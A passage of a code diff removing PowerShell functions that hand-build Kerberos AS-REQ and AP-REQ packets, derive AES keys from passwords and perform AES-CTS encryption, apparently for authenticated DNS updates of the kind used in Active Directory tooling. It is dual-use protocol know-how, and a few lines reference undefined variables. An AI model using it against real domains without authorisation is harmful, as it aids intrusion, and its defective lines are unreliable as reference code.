- 7 {[Byte[]]$usage_constant = 0x8b,0x70,0xb8,0xdc,0x6a,0x8d,0xa9,0x1d,0x62,0xb1,0x58,0xac,0x55,0x40,0xeb,0x15 + $padding}
- 11 {[Byte[]]$usage_constant = 0xab,0x80,0xc0,0x60,0xaa,0xaf,0xaa,0x2e,0x6a,0xb5,0x5a,0xad,0x55,0x41,0x6b,0x55 + $padding}
- }
-
- }
-
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $base_key
- $AES_encryptor = $AES.CreateEncryptor()
- $usage_key = $AES_encryptor.TransformFinalBlock($usage_constant,0,$usage_constant.Length)
-
- return $usage_key
- }
-
- # TCPClient Kerberos start - this section can be removed if not using a hash or -TCPClientAuth
- function Get-KerberosAES256BaseKey
- {
- param([String]$salt,[System.Security.SecureString]$password)
-
- $password_BSTR = [System.Runtime.InteropServices.Marshal]::SecureStringToBSTR($password)
- $password_cleartext = [System.Runtime.InteropServices.Marshal]::PtrToStringAuto($password_BSTR)
- [Byte[]]$salt = [System.Text.Encoding]::UTF8.GetBytes($salt)
- [Byte[]]$password_cleartext = [System.Text.Encoding]::UTF8.GetBytes($password_cleartext)
- $constant = 0x6B,0x65,0x72,0x62,0x65,0x72,0x6F,0x73,0x7B,0x9B,0x5B,0x2B,0x93,0x13,0x2B,0x93,0x5C,0x9B,0xDC,0xDA,0xD9,0x5C,0x98,0x99,0xC4,0xCA,0xE4,0xDE,0xE6,0xD6,0xCA,0xE4
- $PBKDF2 = New-Object Security.Cryptography.Rfc2898DeriveBytes($password_cleartext,$salt,4096)
- Remove-Variable password_cleartext
- $PBKDF2_key = $PBKDF2.GetBytes(32)
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::None
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $PBKDF2_key
- $AES_encryptor = $AES.CreateEncryptor()
- $base_key_part_1 = $AES_encryptor.TransformFinalBlock($constant,0,$constant.Length)
- $base_key_part_2 = $AES_encryptor.TransformFinalBlock($base_key_part_1,0,$base_key_part_1.Length)
- $base_key = $base_key_part_1[0..15] + $base_key_part_2[0..15]
-
- return $base_key
- }
-
- function New-PacketKerberosASREQ()
- {
- param([Byte[]]$username,[Byte[]]$realm,[Byte[]]$namestring,[Byte[]]$nonce,[Byte[]]$pac,[Byte[]]$pac_signature)
-
- $timestamp = Get-Date
- $till = $timestamp.AddYears(20)
- $timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
- $till = ("{0:u}" -f $till) -replace "-","" -replace " ","" -replace ":",""
- [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
- [Byte[]]$till = [System.Text.Encoding]::UTF8.GetBytes($till)
-
- if($pac)
- {
- $pac_extra_length = 78
- }
-
- [Byte[]]$namestring1_length = Get-ASN1LengthArray $namestring.Count
- [Byte[]]$namestring_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + 6)
- [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + 7)
- [Byte[]]$sname_length = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 13)
- [Byte[]]$sname_length2 = Get-ASN1LengthArray ($namestring.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 14)
- [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
- [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
- [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
- [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
- [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
- [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
- $grouped_length = $address_length.Count + $address_length2.Count + $address_length3.Count + $address_length4.Count + $address_length5.Count + $namestring.Count +
- $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + $realm.Count + $realm_length.Count +
- $realm_length2.Count + $username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count
- [Byte[]]$reqbody_length = Get-ASN1LengthArrayLong ($grouped_length + 86)
- [Byte[]]$reqbody_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + 87)
- [Byte[]]$message_length = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $pac_extra_length + 114)
- [Byte[]]$message_length2 = Get-ASN1LengthArrayLong ($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $pac_extra_length + 115)
- [Byte[]]$asreq_length = [System.BitConverter]::GetBytes($grouped_length + $reqbody_length.Count + $reqbody_length2.Count + $message_length.Count + $message_length2.Count +
- $pac_extra_length + 116)[3..0]
-
- $packet_KerberosASREQ = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosASREQ.Add("Length",$asreq_length)
- $packet_KerberosASREQ.Add("Message_Encoding",[Byte[]](0x6a) + $message_length2 + [Byte[]](0x30) + $message_length)
- $packet_KerberosASREQ.Add("Message_PVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_PVNO",[Byte[]](0x05))
- $packet_KerberosASREQ.Add("Message_MSGType_Encoding",[Byte[]](0xa2,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_MSGType",[Byte[]](0x0a))
-
- if($pac)
- {
- $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x5c,0x30,0x5a,0x30,0x4c,0xa1,0x03,0x02,0x01,0x02))
- $packet_KerberosASREQ.Add("Message_PAData0_Type_Encoding",[Byte[]](0xa2,0x45,0x04,0x43,0x30,0x41,0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_PAData0_Type",[Byte[]](0x12))
- $packet_KerberosASREQ.Add("Message_PAData0_Value_Encoding",[Byte[]](0xa2,0x3a,0x04,0x38))
- $packet_KerberosASREQ.Add("Message_PAData0_Value",$pac)
- $packet_KerberosASREQ.Add("Message_PAData0_Signature",$pac_signature)
- $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0x30,0x0a,0xa1,0x04,0x02,0x02))
- }
- else
- {
- $packet_KerberosASREQ.Add("Message_PAData_Encoding",[Byte[]](0xa3,0x0e,0x30,0x0c,0x30,0x0a))
- $packet_KerberosASREQ.Add("Message_PAData1_Type_Encoding",[Byte[]](0xa1,0x04,0x02,0x02))
- }
-
- $packet_KerberosASREQ.Add("Message_PAData1_Type",[Byte[]](0x00,0x95))
- $packet_KerberosASREQ.Add("Message_PAData1_Value_Encoding",[Byte[]](0xa2,0x02,0x04))
- $packet_KerberosASREQ.Add("Message_PAData1_Value",[Byte[]](0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_Encoding",[Byte[]](0xa4) + $reqbody_length2 + [Byte[]](0x30) + $reqbody_length)
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Encoding",[Byte[]](0xa0,0x07,0x03,0x05))
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions_Padding",[Byte[]](0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_KDCOptions",[Byte[]](0x50,0x00,0x00,0x00))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_Encoding",[Byte[]](0xa1) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameType",[Byte[]](0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) + $cname_length2 + [Byte[]](0x1b) + $cname_length)
- $packet_KerberosASREQ.Add("Message_REQBody_CName_NameString",$username)
- $packet_KerberosASREQ.Add("Message_REQBody_Realm_Encoding",[Byte[]](0xa2) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
- $packet_KerberosASREQ.Add("Message_REQBody_Realm",$realm)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_Encoding",[Byte[]](0xa3) + $sname_length2 + [Byte[]](0x30) + $sname_length)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameType",[Byte[]](0x01))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString_Encoding",[Byte[]](0xa1) + $namestring_length2 + [Byte[]](0x30) + $namestring_length)
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length) #50
- $packet_KerberosASREQ.Add("Message_REQBody_SName_NameString1",$namestring)
- $packet_KerberosASREQ.Add("Message_REQBody_Till_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
- $packet_KerberosASREQ.Add("Message_REQBody_Till",$till)
- $packet_KerberosASREQ.Add("Message_REQBody_Nonce_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
- $packet_KerberosASREQ.Add("Message_REQBody_Nonce",$nonce)
- $packet_KerberosASREQ.Add("Message_REQBody_EType_Encoding",[Byte[]](0xa8,0x15,0x30,0x13))
- $packet_KerberosASREQ.Add("Message_REQBody_EType",[Byte[]](0x02,0x01,0x12,0x02,0x01,0x11,0x02,0x01,0x17,0x02,0x01,0x18,0x02,0x02,0xff,0x79,0x02,0x01,0x03))
-
- return $packet_KerberosASREQ
- }
-
- function New-PacketKerberosAPREQ()
- {
- param([Byte[]]$realm,[Byte[]]$spn,[Byte[]]$kvno,[Byte[]]$ticket,[Byte[]]$authenticator,[Byte[]]$authenticator_signature)
-
- $authenticator += $authenticator_signature
- $parameter_length = $realm.Count + $spn.Count + $ticket.Count + $authenticator.Count
- [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong $authenticator.Count
- [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + 1)
- [Byte[]]$authenticator_length3 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + 7)
- [Byte[]]$authenticator_length4 = Get-ASN1LengthArrayLong ($authenticator.Count + $authenticator_length.Count + $authenticator_length2.Count + $authenticator_length3.Count + 8)
- [Byte[]]$ticket_length = Get-ASN1LengthArrayLong $ticket.Count
- [Byte[]]$ticket_length2 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + 1)
- [Byte[]]$ticket_length3 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + 12)
- [Byte[]]$ticket_length4 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + 13)
- [Byte[]]$namestring1_length = Get-ASN1LengthArray $spn.Count
- [Byte[]]$namestring_length = Get-ASN1LengthArray ($spn.Count + $namestring_length.Count + 4)
- [Byte[]]$namestring_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + 5)
- [Byte[]]$sname_length = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + 4)
- [Byte[]]$sname_length2 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + 5)
- [Byte[]]$sname_length3 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count + 11)
- [Byte[]]$sname_length4 = Get-ASN1LengthArray ($spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + 12)
- [Byte[]]$realm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$realm_length2 = Get-ASN1LengthArray ($realm.Count + $realm_length.Count + 1)
- [Byte[]]$ticket_length5 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + 34)
- [Byte[]]$ticket_length6 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + 35)
- [Byte[]]$ticket_length7 = Get-ASN1LengthArrayLong ($ticket.Count + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count + $ticket_length4.Count +
- $spn.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + 36)
- [Byte[]]$apreq_length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count + 73)
- [Byte[]]$apreq_length2 = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
- $apreq_length.Count + 74)
- [Byte[]]$length = Get-ASN1LengthArrayLong ($parameter_length + $ticket_length.Count + $ticket_length2.Count + $ticket_length3.Count +
- $ticket_length4.Count + $namestring1_length.Count + $namestring_length.Count + $namestring_length2.Count + $sname_length.Count + $sname_length2.Count +
- $sname_length3.Count + $sname_length4.Count + $realm_length.Count + $realm_length2.Count + $ticket_length5.Count + $ticket_length6.Count + $ticket_length7.Count +
- $apreq_length.Count + $apreq_length2.Count + 88)
-
- $packet_KerberosAPREQ = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosAPREQ.Add("Length",([Byte[]](0x60) + $length))
- $packet_KerberosAPREQ.Add("MechToken_ThisMech",[Byte[]](0x06,0x09,0x2a,0x86,0x48,0x86,0xf7,0x12,0x01,0x02,0x02))
- $packet_KerberosAPREQ.Add("MechToken_TokenID",[Byte[]](0x01,0x00))
- $packet_KerberosAPREQ.Add("APReq_Encoding",[Byte[]](0x6e) + $apreq_length2 + [Byte[]](0x30) + $apreq_length)
- $packet_KerberosAPREQ.Add("PVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("PVNO",[Byte[]]0x05)
- $packet_KerberosAPREQ.Add("MSGType_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("MSGType",[Byte[]](0x0e))
- $packet_KerberosAPREQ.Add("Padding_Encoding",[Byte[]](0xa2,0x07,0x03,0x05))
- $packet_KerberosAPREQ.Add("Padding",[Byte[]](0x00))
- $packet_KerberosAPREQ.Add("APOptions",[Byte[]](0x20,0x00,0x00,0x00))
- $packet_KerberosAPREQ.Add("Ticket_Encoding",[Byte[]](0xa3) + $ticket_length7 + [Byte[]](0x61) + $ticket_length6 + [Byte[]](0x30) + $ticket_length5)
- $packet_KerberosAPREQ.Add("Ticket_TKTVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_TKTVNO",[Byte[]](0x05))
- $packet_KerberosAPREQ.Add("Ticket_Realm_Encoding",[Byte[]](0xa1) + $realm_length2 + [Byte[]](0x1b) + $realm_length)
- $packet_KerberosAPREQ.Add("Ticket_Realm",$realm)
- $packet_KerberosAPREQ.Add("Ticket_SName_Encoding",[Byte[]](0xa2) + $sname_length4 + [Byte[]](0x30) + $sname_length3)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameType",[Byte[]](0x01))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString_Encoding",[Byte[]](0xa1) + $sname_length2 + [Byte[]](0x30) + $sname_length)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString0_Encoding",[Byte[]](0x1b,0x03))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString0",[Byte[]](0x44,0x4e,0x53))
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString1_Encoding",[Byte[]](0x1b) + $namestring1_length)
- $packet_KerberosAPREQ.Add("Ticket_SName_NameString1",$spn)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Encoding",[Byte[]](0xa3) + $ticket_length4 + [Byte[]](0x30) + $ticket_length3)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_EType",[Byte[]](0x12))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO_Encoding",[Byte[]](0xa1,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Ticket_EncPart_KVNO",$kvno)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher_Encoding",[Byte[]](0xa2) + $ticket_length2 + [Byte[]](0x04) + $ticket_length)
- $packet_KerberosAPREQ.Add("Ticket_EncPart_Cipher",$ticket)
- $packet_KerberosAPREQ.Add("Authenticator_Encoding",[Byte[]](0xa4) + $authenticator_length4 + [Byte[]](0x30) + $authenticator_length3)
- $packet_KerberosAPREQ.Add("Authenticator_EType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAPREQ.Add("Authenticator_EType",[Byte[]](0x12))
- $packet_KerberosAPREQ.Add("Authenticator_Cipher_Encoding",[Byte[]](0xa2) + $authenticator_length2 + [Byte[]](0x04) + $authenticator_length)
- $packet_KerberosAPREQ.Add("Authenticator_Cipher",$authenticator)
-
- return $packet_KerberosAPREQ
- }
-
- function Unprotect-KerberosASREP
- {
- param([Byte[]]$ke_key,[Byte[]]$encrypted_data)
-
- $final_block_length = [Math]::Truncate($encrypted_data.Count % 16)
- [Byte[]]$final_block = $encrypted_data[($encrypted_data.Count - $final_block_length)..$encrypted_data.Count]
- [Byte[]]$penultimate_block = $encrypted_data[($encrypted_data.Count - $final_block_length - 16)..($encrypted_data.Count - $final_block_length - 1)]
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $AES.IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.KeySize = 256
- $AES.Key = $ke_key
- $AES_decryptor = $AES.CreateDecryptor()
- $penultimate_block_cleartext = $AES_decryptor.TransformFinalBlock($penultimate_block,0,$penultimate_block.Length)
- [Byte[]]$final_block_padding = $penultimate_block_cleartext[$final_block_length..$penultimate_block_cleartext.Count]
- $final_block += $final_block_padding
- [Byte[]]$cts_encrypted_data = $encrypted_data[0..($encrypted_data.Count - $final_block_length - 17)] + $final_block + $penultimate_block
- [Byte[]]$cleartext = $AES_decryptor.TransformFinalBlock($cts_encrypted_data,0,$cts_encrypted_data.Length)
-
- return $cleartext
- }
-
- function New-KerberosPACTimestamp
- {
- param([Byte[]]$ke_key)
-
- [Byte[]]$timestamp = Get-KerberosTimestampUTC
- [String]$confounder = [String](1..16 | ForEach-Object {"{0:X2}" -f (Get-Random -Minimum 1 -Maximum 255)})
- [Byte[]]$confounder = $confounder.Split(" ") | ForEach-Object{[Char][System.Convert]::ToInt16($_,16)}
-
- [Byte[]]$PAC_Timestamp = $confounder +
- 0x30,0x1a,0xa0,0x11,0x18,0x0f +
- $timestamp +
- 0xa1,0x05,0x02,0x03,0x01,0x70,0x16
-
- return $PAC_Timestamp
- }
-
- function New-KerberosAuthenticator
- {
- param([Byte[]]$realm,[Byte[]]$username,[Byte[]]$subkey,[Byte[]]$sequence_number)
-
- $parameter_length = $realm.Count + $username.Count + $subkey.Count
- [Byte[]]$subkey_length = Get-ASN1LengthArray $subkey.Count
- [Byte[]]$subkey_length2 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + 1)
- [Byte[]]$subkey_length3 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + 7)
- [Byte[]]$subkey_length4 = Get-ASN1LengthArray ($subkey.Count + $subkey_length.Count + $subkey_length2.Count + $subkey_length3.Count + 8)
- [Byte[]]$cname_length = Get-ASN1LengthArray $username.Count
- [Byte[]]$cname_length2 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + 1)
- [Byte[]]$cname_length3 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + 2)
- [Byte[]]$cname_length4 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + 8)
- [Byte[]]$cname_length5 = Get-ASN1LengthArray ($username.Count + $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + 9)
- [Byte[]]$crealm_length = Get-ASN1LengthArray $realm.Count
- [Byte[]]$crealm_length2 = Get-ASN1LengthArray ($realm.Count + $crealm_length.Count + 1)
- [Byte[]]$authenticator_length = Get-ASN1LengthArrayLong ($parameter_length + 99 + $crealm_length.Count + $crealm_length2.Count +
- $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
- $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count)
- [Byte[]]$authenticator_length2 = Get-ASN1LengthArrayLong ($parameter_length + 100 + $crealm_length.Count + $crealm_length2.Count +
- $cname_length.Count + $cname_length2.Count + $cname_length3.Count + $cname_length4.Count + $cname_length5.Count + $subkey_length.Count +
- $subkey_length2.Count + $subkey_length3.Count + $subkey_length4.Count + $authenticator_length.Count)
-
- $packet_KerberosAuthenticator = New-Object System.Collections.Specialized.OrderedDictionary
- $packet_KerberosAuthenticator.Add("Encoding",[Byte[]](0x62) + $authenticator_length2 + [Byte[]](0x30) + $authenticator_length)
- $packet_KerberosAuthenticator.Add("AuthenticatorVNO_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("AuthenticatorVNO",[Byte[]](0x05))
- $packet_KerberosAuthenticator.Add("CRealm_Encoding",[Byte[]](0xa1) + $crealm_length2 + [Byte[]](0x1b) + $crealm_length)
- $packet_KerberosAuthenticator.Add("CRealm",$realm)
- $packet_KerberosAuthenticator.Add("CName_Encoding",[Byte[]](0xa2) + $cname_length5 + [Byte[]](0x30) + $cname_length4)
- $packet_KerberosAuthenticator.Add("CName_NameType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("CName_NameType",[Byte[]](0x01))
- $packet_KerberosAuthenticator.Add("CName_CNameString_Encoding",[Byte[]](0xa1) + $cname_length3 + [Byte[]](0x30) +
- $cname_length2 + [Byte[]](0x1b) + $cname_length)
- $packet_KerberosAuthenticator.Add("CName_CNameString",$username)
- $packet_KerberosAuthenticator.Add("CKSum_Encoding",[Byte[]](0xa3,0x25,0x30,0x23,0xa0,0x05,0x02,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_CKSumType",[Byte[]](0x00,0x80,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_Length_Encoding",[Byte[]](0xa1,0x1a,0x04,0x18))
- $packet_KerberosAuthenticator.Add("CKSum_Length",[Byte[]](0x10,0x00,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_Bnd",[Byte[]](0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_Flags",[Byte[]](0x36,0x01,0x00,0x00))
- $packet_KerberosAuthenticator.Add("CKSum_CUSec_Encoding",[Byte[]](0xa4,0x05,0x02,0x03))
- $packet_KerberosAuthenticator.Add("CKSum_CUSec",(Get-KerberosMicrosecond))
- $packet_KerberosAuthenticator.Add("CKSum_CTime_Encoding",[Byte[]](0xa5,0x11,0x18,0x0f))
- $packet_KerberosAuthenticator.Add("CKSum_CTime",(Get-KerberosTimestampUTC))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_Encoding",[Byte[]](0xa6) + $subkey_length4 + [Byte[]](0x30) + $subkey_length3)
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType_Encoding",[Byte[]](0xa0,0x03,0x02,0x01))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyType",[Byte[]](0x12))
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue_Encoding",[Byte[]](0xa1) + $subkey_length2 + [Byte[]](0x04) + $subkey_length)
- $packet_KerberosAuthenticator.Add("CKSum_Subkey_KeyValue",$subkey)
- $packet_KerberosAuthenticator.Add("CKSum_SEQNumber_Encoding",[Byte[]](0xa7,0x06,0x02,0x04))
- $packet_KerberosAuthenticator.Add("CKSum_SEQNumber",$sequence_number)
-
- return $packet_KerberosAuthenticator
- }
-
- function Get-KerberosTimestampUTC
- {
- [DateTime]$timestamp = (Get-Date).ToUniversalTime()
- [String]$timestamp = ("{0:u}" -f $timestamp) -replace "-","" -replace " ","" -replace ":",""
- [Byte[]]$timestamp = [System.Text.Encoding]::UTF8.GetBytes($timestamp)
-
- return $timestamp
- }
-
- function Get-KerberosMicrosecond
- {
- [Int]$microseconds = Get-Date -Format ffffff
- [Byte[]]$microseconds = [System.Bitconverter]::GetBytes($microseconds)[0..2]
-
- return $microseconds
- }
-
- function Protect-KerberosAES256CTS
- {
- param([Byte[]]$ke_key,[Byte[]]$data)
-
- $AES = New-Object "System.Security.Cryptography.AesManaged"
- $AES.Mode = [System.Security.Cryptography.CipherMode]::CBC
- $AES.Padding = [System.Security.Cryptography.PaddingMode]::Zeros
- $IV = 0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00,0x00
- $AES.IV = $IV
- $AES.KeySize = 256
- $AES.Key = $ke_key
- $AES_encryptor = $AES.CreateEncryptor()
- $data_encrypted = $AES_encryptor.TransformFinalBlock($data,0,$data.Length)
- $block_count = [Math]::Ceiling($data_encrypted.Count / 16)
-
- if($block_count -gt 2)
- {
- $data_encrypted = $data_encrypted[0..($data_encrypted.Count - 33)] + $data_encrypted[($data_encrypted.Count - 16)..$data_encrypted.Count] +
- $data_encrypted[($data_encrypted.Count - 32)..($data_encrypted.Count - 17)]
- }
- elseif($blocks -eq 2)
- {
- $data_encrypted = $data_encrypted[16..31] + $data_encrypted[0..15]
- }
-
- $final_block_length = [Math]::Truncate($data.Count % 16)
-
- if($final_block_length -ne 0)
- {
- $remove_count = 16 - $final_block_length
- $data_encrypted = $data_encrypted[0..($data_encrypted.Count - $remove_count - 1)]
- }
-
- return $data_encrypted
- }
- # TCPClient Kerberos end
-
- function Get-KerberosHMACSHA1
- {
- param([Byte[]]$key,[Byte[]]$data)
-
- $HMAC_SHA1 = New-Object System.Security.Cryptography.HMACSHA1
- $HMAC_SHA1.key = $key
- $hash = $HMAC_SHA1.ComputeHash($data)
- $hash = $hash[0..11]
-
- return $hash
- }
-
- function Get-ASN1LengthArray
- {
- param([Int]$length)
-
- [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
-
- if($asn1[1] -eq 0)
- {
- $asn1 = $asn1[0]
- }
- else
- {
- $asn1 = $asn1[1,0]
- }
-
- return $asn1
- }
-
- function Get-ASN1LengthArrayLong
- {
- param([Int]$length)
-
- [Byte[]]$asn1 = [System.BitConverter]::GetBytes($length)
-
- if($asn1[1] -eq 0)
- {
- $asn1 = $asn1[0]
- $asn1 = [Byte[]]0x81 + $asn1
- }
- else
- {
- $asn1 = $asn1[1,0]
- $asn1 = [Byte[]]0x82 + $asn1
- }
-
- return $asn1
